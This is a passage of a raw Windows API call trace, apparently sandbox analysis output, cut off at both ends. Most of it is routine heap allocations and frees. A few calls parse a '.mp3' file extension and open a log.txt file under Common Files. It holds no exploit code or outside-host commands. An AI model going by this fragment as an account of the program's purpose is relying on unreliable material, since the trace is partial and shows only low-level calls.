| out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.979] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.980] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.981] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.982] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.982] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.983] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.984] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x130) returned 0x7c5448 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.986] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, 